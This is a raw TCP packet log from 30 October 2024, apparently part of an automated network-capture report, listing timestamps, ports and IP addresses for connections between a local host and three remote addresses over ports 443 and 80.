                                                                                                  Oct 30, 2024 08:04:42.679137945 CET49172443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:42.685954094 CET44349171172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:42.686017990 CET49171443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:42.754538059 CET49171443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:42.754578114 CET44349171172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:42.755747080 CET44349171172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:42.755814075 CET49171443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:42.806751966 CET49172443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:42.851346970 CET44349172172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:42.877298117 CET4916780192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.129252911 CET44349172172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.129338980 CET44349172172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.129362106 CET49172443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:43.129396915 CET49172443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:43.174371004 CET49172443192.168.2.22172.67.162.95
                                                                                                  Oct 30, 2024 08:04:43.174396038 CET44349172172.67.162.95192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.423691034 CET4917380192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.424169064 CET4917480192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.429470062 CET8049173198.46.178.151192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.429534912 CET4917380192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.429584026 CET8049174198.46.178.151192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.429645061 CET4917480192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.430160046 CET4917480192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:43.435434103 CET8049174198.46.178.151192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.632293940 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.632409096 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.641076088 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.641139030 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.749602079 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.749691010 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.749706984 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.749725103 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.749779940 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.749787092 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.756884098 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.756947994 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.756956100 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.761445045 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.761502028 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.761509895 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.770539999 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.770617008 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.770632029 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.789128065 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.867619038 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.867698908 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.867738008 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.867789984 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.867820024 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.867887974 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.874535084 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.878989935 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.879043102 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.879067898 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.879081964 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.879128933 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.888370037 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.888457060 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.888525009 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.888533115 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.895606995 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.895689964 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.985210896 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.985299110 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.985333920 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.985373020 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.985429049 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.985470057 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.992125034 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.996655941 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.996709108 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.996721983 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:43.996731043 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:43.996768951 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.005966902 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.006036043 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.006078959 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.006086111 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.050797939 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.050896883 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.090423107 CET8049174198.46.178.151192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.090523005 CET4917480192.168.2.22198.46.178.151
                                                                                                  Oct 30, 2024 08:04:44.102721930 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.102827072 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.102863073 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.102895975 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.102911949 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.102924109 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.102957964 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.109812021 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.109891891 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.109956980 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.109986067 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.114382982 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.114449978 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.114466906 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.123579025 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.123635054 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.123648882 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.130769014 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.130841017 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.166222095 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220293045 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220345974 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220360041 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.220379114 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220412970 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.220413923 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220423937 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.220449924 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.227737904 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.232114077 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.232162952 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.232171059 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.232180119 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.232214928 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.241159916 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.283890009 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.283956051 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.283982992 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338028908 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338080883 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338088036 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.338110924 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338155031 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338156939 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.338165998 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.338201046 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.345215082 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.345290899 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.345347881 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.345366955 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.345424891 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.345464945 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.345470905 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.349697113 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.349762917 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.349776030 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.401772976 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.401830912 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.401864052 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455513000 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455585957 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455594063 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.455609083 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455634117 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455655098 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.455661058 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.455698967 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.462836981 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.462901115 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.462925911 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.462948084 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.462964058 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.463001013 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.467576981 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.519126892 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.519191027 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.519193888 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.519212008 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.519258022 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.578408003 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578490019 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578528881 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578548908 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.578572989 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578624010 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.578629971 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578663111 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.578708887 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.578716040 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.580529928 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.580578089 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.580591917 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.580781937 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.580816984 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.580825090 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.585109949 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.585163116 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.585177898 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.636768103 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.636845112 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.636867046 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699462891 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699495077 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699547052 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.699577093 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699621916 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.699810028 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699861050 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.699896097 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.699901104 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700508118 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700536966 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700562000 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.700567961 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700604916 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.700701952 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700894117 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.700930119 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.700934887 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.704103947 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.704152107 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.704164028 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.722887993 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.723035097 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.754460096 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817006111 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817047119 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817051888 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.817068100 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817095995 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.817152023 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817286015 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817320108 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.817325115 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817405939 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.817441940 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.817446947 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.818140984 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.818186045 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.818202972 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.821521997 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.821584940 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.821590900 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.872108936 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.872164011 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.872164011 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.872183084 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.872220993 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.872273922 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934583902 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934624910 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934632063 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.934645891 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934694052 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.934839010 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934931040 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.934967995 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.934973955 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935074091 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935103893 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.935108900 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935772896 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935802937 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935817957 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.935826063 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.935856104 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.939219952 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.989995956 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.990056992 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.990061045 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:44.990080118 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:44.990118980 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.034096003 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.052256107 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.052305937 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.052433014 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.052473068 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053292990 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053333044 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053360939 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053383112 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.053394079 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053608894 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053639889 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.053647995 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.053656101 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.054102898 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.054141045 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.054164886 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.054173946 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.056720972 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.056895971 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.063402891 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.063421011 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.063500881 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.107640028 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.107714891 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.107764959 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.107784033 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170073032 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170120955 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170152903 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170171976 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.170188904 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170247078 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170252085 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.170257092 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170286894 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.170341015 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170569897 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.170610905 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.170617104 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.171206951 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.171236992 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.171252012 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.171260118 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.171375036 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.171746969 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.174741983 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.174951077 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.174962997 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.225276947 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.225339890 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.225358963 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.231131077 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.231199980 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.287564039 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.287662983 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.287740946 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.287760019 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.287794113 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.287846088 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.287852049 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.288377047 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.288405895 CET44349169172.217.16.193192.168.2.22
                                                                                                  Oct 30, 2024 08:04:45.288415909 CET49169443192.168.2.22172.217.16.193
                                                                                                  Oct 30, 2024 08:04:45.288423061 CET44349169172.217.16.193192.168.2.22
